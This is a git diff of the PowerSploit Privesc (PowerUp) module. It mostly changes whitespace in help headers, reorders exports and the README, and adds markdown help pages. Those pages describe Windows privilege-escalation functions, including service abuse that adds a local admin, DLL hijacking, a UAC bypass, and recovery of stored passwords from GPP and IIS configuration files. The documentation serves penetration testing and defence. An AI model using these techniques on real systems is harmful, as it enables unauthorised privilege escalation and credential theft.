-License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1065,9 +1065,9 @@ function Get-ProcessTokenGroup { Returns all SIDs that the current token context is a part of, whether they are disabled or not. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect, Get-TokenInformation +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation .DESCRIPTION @@ -1197,9 +1197,9 @@ function Get-ProcessTokenPrivilege { Returns all privileges for the current (or specified) process ID. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect, Get-TokenInformation +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation .DESCRIPTION @@ -1354,9 +1354,9 @@ function Enable-Privilege { Enables a specific privilege for the current process. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1451,9 +1451,9 @@ function Add-ServiceDacl { Adds a Dacl field to a service object returned by Get-Service. -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1567,9 +1567,9 @@ function Set-ServiceBinaryPath { Sets the binary path for a service to a specified value. -Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1688,9 +1688,9 @@ function Test-ServiceDaclPermission { Tests one or more passed services or service names against a given permission set, returning the service objects where the current user have the specified permissions. -Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: Add-ServiceDacl +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Add-ServiceDacl .DESCRIPTION @@ -1868,9 +1868,9 @@ function Get-UnquotedService { Returns the name and binary path for services with unquoted paths that also have a space in the name. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission .DESCRIPTION @@ -1931,9 +1931,9 @@ function Get-ModifiableServiceFile { Enumerates all services and returns vulnerable service files. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Test-ServiceDaclPermission +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath .DESCRIPTION @@ -1989,9 +1989,9 @@ function Get-ModifiableService { Enumerates all services and returns services for which the current user can modify the binPath. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Test-ServiceDaclPermission +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail .DESCRIPTION @@ -2036,9 +2036,9 @@ function Get-ServiceDetail { Returns detailed information about a specified service by querying the WMI win32_service class for the specified service name. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -2109,9 +2109,9 @@ function Invoke-ServiceAbuse { Abuses a function the current user has configuration rights on in order to add a local administrator or execute a custom command. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath .DESCRIPTION @@ -2346,9 +2346,9 @@ function Write-ServiceBinary { Patches in the specified command to a pre-compiled C# service executable and writes the binary out to the specified ServicePath location. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -2529,9 +2529,9 @@ function Install-ServiceBinary { Replaces the service binary for the specified service with one that executes a specified command as SYSTEM. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary .DESCRIPTION @@ -2698,9 +2698,9 @@ function Restore-ServiceBinary { Restores a service binary backed up by Install-ServiceBinary. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ServiceDetail, Get-ModifiablePath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath .DESCRIPTION @@ -2793,9 +2793,9 @@ function Find-ProcessDLLHijack { Finds all DLL hijack locations for currently running processes. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -2948,9 +2948,9 @@ function Find-PathDLLHijack { Finds all directories in the system %PATH% that are modifiable by the current user. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ModifiablePath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath .DESCRIPTION @@ -3001,9 +3001,9 @@ function Write-HijackDll { Patches in the path to a specified .bat (containing the specified command) into a pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3229,9 +3229,9 @@ function Get-RegistryAlwaysInstallElevated { Checks if any of the AlwaysInstallElevated registry keys are set. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3298,9 +3298,9 @@ function Get-RegistryAutoLogon { Finds any autologon credentials left in the registry. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3361,9 +3361,9 @@ function Get-ModifiableRegistryAutoRun { Returns any elevated system autoruns in which the current user can modify part of the path string. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath .DESCRIPTION @@ -3439,9 +3439,9 @@ function Get-ModifiableScheduledTaskFile { Returns scheduled tasks where the current user can modify any file in the associated task action string. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath .DESCRIPTION @@ -3518,9 +3518,9 @@ function Get-UnattendedInstallFile { Checks several locations for remaining unattended installation files, which may have deployment credentials. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .EXAMPLE @@ -3577,9 +3577,9 @@ function Get-WebConfig { This script will recover cleartext and encrypted connection strings from all web.config files on the system. Also, it will decrypt them if needed. -Author: Scott Sutherland, Antti Rantasaari -License: BSD 3-Clause -Required Dependencies: None +Author: Scott Sutherland, Antti Rantasaari +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3791,9 +3791,9 @@ function Get-ApplicationHost { Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system. -Author: Scott Sutherland -License: BSD 3-Clause -Required Dependencies: None +Author: Scott Sutherland +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3952,10 +3952,10 @@ function Get-SiteListPassword { Retrieves the plaintext passwords for found McAfee's SiteList.xml files. Based on Jerome Nokin (@funoverip)'s Python solution (in links). -Author: Jerome Nokin (@funoverip) -PowerShell Port: @harmj0y -License: BSD 3-Clause -Required Dependencies: None +Author: Jerome Nokin (@funoverip) +PowerShell Port: @harmj0y +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4153,9 +4153,9 @@ function Get-CachedGPPPassword { Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and left in cached files on the host. -Author: Chris Campbell (@obscuresec), local cache mods by @harmj0y -License: BSD 3-Clause -Required Dependencies: None +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4360,9 +4360,9 @@ function Write-UserAddMSI { Writes out a precompiled MSI installer that prompts for a user/group addition. This function can be used to abuse Get-RegistryAlwaysInstallElevated. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4414,9 +4414,9 @@ function Invoke-WScriptUACBypass { Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. -Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie -License: BSD 3-Clause -Required Dependencies: None +Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4650,9 +4650,9 @@ function Invoke-PrivescAudit { Executes all functions that check for various Windows privilege escalation opportunities. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4979,4 +4979,6 @@ $Advapi32 = $Types['advapi32'] $Kernel32 = $Types['kernel32'] $NTDll = $Types['ntdll'] +Set-Alias Get-CurrentUserTokenGroupSid Get-ProcessTokenGroup +Set-Alias Get-UnquotedService Get-UnquotedService Set-Alias Invoke-AllChecks Invoke-PrivescAudit diff --git a/Privesc/Privesc.psd1 b/Privesc/Privesc.psd1 index fb66225..6d4e3bd 100644 --- a/Privesc/Privesc.psd1 +++ b/Privesc/Privesc.psd1 @@ -23,37 +23,36 @@ PowerShellVersion = '2.0' # Functions to export from this module FunctionsToExport = @( - 'Add-ServiceDacl', - 'Enable-Privilege', - 'Find-PathDLLHijack', - 'Find-ProcessDLLHijack', - 'Get-ApplicationHost', - 'Get-CachedGPPPassword', 'Get-ModifiablePath', - 'Get-ModifiableRegistryAutoRun', - 'Get-ModifiableScheduledTaskFile', - 'Get-ModifiableService', - 'Get-ModifiableServiceFile', 'Get-ProcessTokenGroup', 'Get-ProcessTokenPrivilege', + 'Enable-Privilege', + 'Add-ServiceDacl', + 'Set-ServiceBinaryPath', + 'Test-ServiceDaclPermission', + 'Get-UnquotedService', + 'Get-ModifiableServiceFile', + 'Get-ModifiableService', + 'Get-ServiceDetail', + 'Invoke-ServiceAbuse', + 'Write-ServiceBinary', + 'Install-ServiceBinary', + 'Restore-ServiceBinary', + 'Find-ProcessDLLHijack', + 'Find-PathDLLHijack', + 'Write-HijackDll', 'Get-RegistryAlwaysInstallElevated', 'Get-RegistryAutoLogon', - 'Get-ServiceDetail', - 'Get-SiteListPassword', - 'Get-TokenInformation', - 'Get-UnquotedService', + 'Get-ModifiableRegistryAutoRun', + 'Get-ModifiableScheduledTaskFile', 'Get-UnattendedInstallFile', 'Get-WebConfig', - 'Install-ServiceBinary', - 'Invoke-ServiceAbuse', + 'Get-ApplicationHost', + 'Get-SiteListPassword', + 'Get-CachedGPPPassword', + 'Write-UserAddMSI', 'Invoke-WScriptUACBypass', 'Invoke-PrivescAudit', - 'Restore-ServiceBinary', - 'Set-ServiceBinaryPath', - 'Test-ServiceDaclPermission', - 'Write-UserAddMSI', - 'Write-HijackDll', - 'Write-ServiceBinary', 'Get-System' ) diff --git a/Privesc/README.md b/Privesc/README.md index d5b499c..ac161d8 100644 --- a/Privesc/README.md +++ b/Privesc/README.md @@ -27,13 +27,18 @@ Required Dependencies: None Optional Dependencies: None -### Service Enumeration: - Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name +### Token/Privilege Enumeration/Abuse: + Get-ProcessTokenGroup - returns all SIDs that the current token context is a part of, whether they are disabled or not + Get-ProcessTokenPrivilege - returns all privileges for the current (or specified) process ID + Enable-Privilege - enables a specific privilege for the current process + +### Service Enumeration/Abuse: + Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set + Get-UnquotedService - returns services with unquoted paths that also have a space in the name Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config Get-ModifiableService - returns services the current user can modify Get-ServiceDetail - returns detailed information about a specified service - -### Service Abuse: + Set-ServiceBinaryPath - sets the binary path for a service to a specified value Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command @@ -45,7 +50,7 @@ Optional Dependencies: None Write-HijackDll - writes out a hijackable DLL ### Registry Checks: - Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set + Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set Get-RegistryAutoLogon - checks for Autologon credentials in the registry Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns @@ -59,9 +64,6 @@ Optional Dependencies: None ### Other Helpers/Meta-Functions: Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify - Get-CurrentUserTokenGroupSid - returns all SIDs that the current user is a part of, whether they are disabled or not - Add-ServiceDacl - adds a Dacl field to a service object returned by Get-Service - Set-ServiceBinPath - sets the binary path for a service to a specified value through Win32 API methods - Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set Write-UserAddMSI - write out a MSI installer that prompts for a user to be added - Invoke-AllChecks - runs all current escalation checks and returns a report + Invoke-WScriptUACBypass - performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe + Invoke-PrivescAudit - runs all current escalation checks and returns a report (formerly Invoke-AllChecks) diff --git a/docs/Privesc/Add-ServiceDacl.md b/docs/Privesc/Add-ServiceDacl.md new file mode 100755 index 0000000..13e4d64 --- /dev/null +++ b/docs/Privesc/Add-ServiceDacl.md @@ -0,0 +1,68 @@ +# Add-ServiceDacl + +## SYNOPSIS +Adds a Dacl field to a service object returned by Get-Service. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Add-ServiceDacl [-Name] +``` + +## DESCRIPTION +Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a +Dacl field to each object. +It does this by opening a handle with ReadControl for the +service with using the GetServiceHandle Win32 API call and then uses +QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Service | Add-ServiceDacl +``` + +Add Dacls for every service the current user can read. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service -Name VMTools | Add-ServiceDacl +``` + +Add the Dacl to the VMTools service object. + +## PARAMETERS + +### -Name +An array of one or more service names to add a service Dacl for. +Passable on the pipeline. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### ServiceProcess.ServiceController + +## NOTES + +## RELATED LINKS + +[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) + diff --git a/docs/Privesc/Enable-Privilege.md b/docs/Privesc/Enable-Privilege.md new file mode 100755 index 0000000..6de9c43 --- /dev/null +++ b/docs/Privesc/Enable-Privilege.md @@ -0,0 +1,105 @@ +# Enable-Privilege + +## SYNOPSIS +Enables a specific privilege for the current process. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Enable-Privilege [-Privilege] +``` + +## DESCRIPTION +Uses RtlAdjustPrivilege to enable a specific privilege for the current process. +Privileges can be passed by string, or the output from Get-ProcessTokenPrivilege +can be passed on the pipeline. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege DISABLED 3620 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620 + SeUndockPrivilege DISABLED 3620 +SeIncreaseWorkingSetPrivilege DISABLED 3620 + SeTimeZonePrivilege DISABLED 3620 + +Enable-Privilege SeShutdownPrivilege + +Get-ProcessTokenPrivilege + + Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege SE_PRIVILEGE_ENABLED 3620 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620 + SeUndockPrivilege DISABLED 3620 +SeIncreaseWorkingSetPrivilege DISABLED 3620 + SeTimeZonePrivilege DISABLED 3620 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId +--------- ---------- --------- +SeShutdownPrivilege DISABLED 2828 +SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828 +SeUndockPrivilege DISABLED 2828 +SeIncreaseWorkingSetPrivilege DISABLED 2828 +SeTimeZonePrivilege DISABLED 2828 + + +Get-ProcessTokenPrivilege | Enable-Privilege -Verbose +VERBOSE: Attempting to enable SeShutdownPrivilege +VERBOSE: Attempting to enable SeChangeNotifyPrivilege +VERBOSE: Attempting to enable SeUndockPrivilege +VERBOSE: Attempting to enable SeIncreaseWorkingSetPrivilege +VERBOSE: Attempting to enable SeTimeZonePrivilege + +Get-ProcessTokenPrivilege + +Privilege Attributes ProcessId +--------- ---------- --------- +SeShutdownPrivilege SE_PRIVILEGE_ENABLED 2828 +SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828 +SeUndockPrivilege SE_PRIVILEGE_ENABLED 2828 +SeIncreaseWorkingSetPrivilege SE_PRIVILEGE_ENABLED 2828 +SeTimeZonePrivilege SE_PRIVILEGE_ENABLED 2828 + +## PARAMETERS + +### -Privilege +{{Fill Privilege Description}} + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Privileges + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html](http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html) + diff --git a/docs/Privesc/Find-PathDLLHijack.md b/docs/Privesc/Find-PathDLLHijack.md new file mode 100755 index 0000000..f43fc69 --- /dev/null +++ b/docs/Privesc/Find-PathDLLHijack.md @@ -0,0 +1,45 @@ +# Find-PathDLLHijack + +## SYNOPSIS +Finds all directories in the system %PATH% that are modifiable by the current user. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Find-PathDLLHijack +``` + +## DESCRIPTION +Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath +to return the folder paths the current user can write to. +On Windows 7, if wlbsctrl.dll is +written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search +order loading. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-PathDLLHijack +``` + +Finds all %PATH% .DLL hijacking opportunities. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL.Path + +## NOTES + +## RELATED LINKS + +[http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738) + diff --git a/docs/Privesc/Find-ProcessDLLHijack.md b/docs/Privesc/Find-ProcessDLLHijack.md new file mode 100755 index 0000000..bbece58 --- /dev/null +++ b/docs/Privesc/Find-ProcessDLLHijack.md @@ -0,0 +1,127 @@ +# Find-ProcessDLLHijack + +## SYNOPSIS +Finds all DLL hijack locations for currently running processes. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Find-ProcessDLLHijack [[-Name] ] [-ExcludeWindows] [-ExcludeProgramFiles] [-ExcludeOwned] +``` + +## DESCRIPTION +Enumerates all currently running processes with Get-Process (or accepts an +input process object from Get-Process) and enumerates the loaded modules for each. +All loaded module name exists outside of the process binary base path, as those +are DLL load-order hijack candidates. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-ProcessDLLHijack +``` + +Finds possible hijackable DLL locations for all processes. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Process VulnProcess | Find-ProcessDLLHijack +``` + +Finds possible hijackable DLL locations for the 'VulnProcess' processes. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles +``` + +Finds possible hijackable DLL locations not in C:\Windows\* and +not in C:\Program Files\* or C:\Program Files (x86)\* + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Find-ProcessDLLHijack -ExcludeOwned +``` + +Finds possible hijackable DLL location for processes not owned by the +current user. + +## PARAMETERS + +### -Name +The name of a process to enumerate for possible DLL path hijack opportunities. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ProcessName + +Required: False +Position: 1 +Default value: $(Get-Process | Select-Object -Expand Name) +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ExcludeWindows +Exclude paths from C:\Windows\* instead of just C:\Windows\System32\* + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeProgramFiles +Exclude paths from C:\Program Files\* and C:\Program Files (x86)\* + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeOwned +Exclude processes the current user owns. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL.Process + +## NOTES + +## RELATED LINKS + +[https://www.mandiant.com/blog/malware-persistence-windows-registry/](https://www.mandiant.com/blog/malware-persistence-windows-registry/) + diff --git a/docs/Privesc/Get-ApplicationHost.md b/docs/Privesc/Get-ApplicationHost.md new file mode 100755 index 0000000..44d07d7 --- /dev/null +++ b/docs/Privesc/Get-ApplicationHost.md @@ -0,0 +1,95 @@ +# Get-ApplicationHost + +## SYNOPSIS +Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system. + +Author: Scott Sutherland +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ApplicationHost +``` + +## DESCRIPTION +This script will decrypt and recover application pool and virtual directory passwords +from the applicationHost.config file on the system. +The output supports the +pipeline which can be used to convert all of the results into a pretty table by piping +to format-table. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Return application pool and virtual directory passwords from the applicationHost.config on the system. +``` + +Get-ApplicationHost + +user : PoolUser1 +pass : PoolParty1! +type : Application Pool +vdir : NA +apppool : ApplicationPool1 +user : PoolUser2 +pass : PoolParty2! +type : Application Pool +vdir : NA +apppool : ApplicationPool2 +user : VdirUser1 +pass : VdirPassword1! +type : Virtual Directory +vdir : site1/vdir1/ +apppool : NA +user : VdirUser2 +pass : VdirPassword2! +type : Virtual Directory +vdir : site2/ +apppool : NA + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Return a list of cleartext and decrypted connect strings from web.config files. +``` + +Get-ApplicationHost | Format-Table -Autosize + +user pass type vdir apppool +---- ---- ---- ---- ------- +PoolUser1 PoolParty1! +Application Pool NA ApplicationPool1 +PoolUser2 PoolParty2! +Application Pool NA ApplicationPool2 +VdirUser1 VdirPassword1! +Virtual Directory site1/vdir1/ NA +VdirUser2 VdirPassword2! +Virtual Directory site2/ NA + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Data.DataTable + +System.Boolean + +## NOTES +Author: Scott Sutherland - 2014, NetSPI +Version: Get-ApplicationHost v1.0 +Comments: Should work on IIS 6 and Above + +## RELATED LINKS + +[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx) + diff --git a/docs/Privesc/Get-CachedGPPPassword.md b/docs/Privesc/Get-CachedGPPPassword.md new file mode 100755 index 0000000..2169a15 --- /dev/null +++ b/docs/Privesc/Get-CachedGPPPassword.md @@ -0,0 +1,55 @@ +# Get-CachedGPPPassword + +## SYNOPSIS +Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and +left in cached files on the host. + +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-CachedGPPPassword +``` + +## DESCRIPTION +Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and +datasources.xml files and returns plaintext passwords. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-CachedGPPPassword +``` + +NewName : \[BLANK\] +Changed : {2013-04-25 18:36:07} +Passwords : {Super!!!Password} +UserNames : {SuperSecretBackdoor} +File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7 + C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr + oups.xml + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb +http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb +http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) + diff --git a/docs/Privesc/Get-ModifiablePath.md b/docs/Privesc/Get-ModifiablePath.md new file mode 100755 index 0000000..2a1118f --- /dev/null +++ b/docs/Privesc/Get-ModifiablePath.md @@ -0,0 +1,102 @@ +# Get-ModifiablePath + +## SYNOPSIS +Parses a passed string containing multiple possible file/folder paths and returns +the file paths where the current user has modification rights. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ModifiablePath [-Path] [-Literal] +``` + +## DESCRIPTION +Takes a complex path specification of an initial file/folder path with possible +configuration files, 'tokenizes' the string in a number of possible ways, and +enumerates the ACLs for each path that currently exists on the system. +Any path that +the current user has modification rights on is returned in a custom object that contains +the modifiable path, associated permission set, and the IdentityReference with the specified +rights. +The SID of the current user and any group he/she are a part of are used as the +comparison set against the parsed path DACLs. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +'"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath +``` + +Path Permissions IdentityReference +---- ----------- ----------------- +C:\Temp\blah.exe {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +C:\Temp\config.ini {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath +``` + +Path Permissions IdentityReference +---- ----------- ----------------- +C:\Vuln\blah.bat {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +C:\Vuln\config.ini {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +... + +## PARAMETERS + +### -Path +The string path to parse for modifiable files. +Required + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: FullName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Literal +Switch. +Treat all paths as literal (i.e. +don't do 'tokenization'). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: LiteralPaths + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenPrivilege.ModifiablePath + +Custom PSObject containing the Permissions, ModifiablePath, IdentityReference for +a modifiable path. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableRegistryAutoRun.md 